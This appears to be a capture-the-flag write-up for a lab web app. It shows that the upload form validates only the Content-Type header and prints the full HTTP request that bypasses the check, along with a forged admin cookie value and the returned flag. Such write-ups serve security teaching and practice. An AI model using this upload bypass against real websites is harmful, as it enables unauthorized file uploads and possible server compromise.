The file upload only check for the content-type variable

We can send anything if we change it 

POST /?page=upload HTTP/1.1
Host: 192.168.1.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------407595108419573024481283095276
Content-Length: 57193
Origin: http://192.168.1.16
Connection: close
Referer: http://192.168.1.16/?page=upload
Cookie: I_am_admin=68934a3e9455fa72420237eb05902327
Upgrade-Insecure-Requests: 1

-----------------------------407595108419573024481283095276
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
-----------------------------407595108419573024481283095276
Content-Disposition: form-data; name="uploaded"; filename="Screenshot from 2023-10-03 20-29-54.png"
Content-Type: image/jpeg

<h2 style="margin-top:50px;">The flag is : 46910d9ce35b385885a9f7e2b336249d622f29b267a1771fbacf52133beddba8</h2>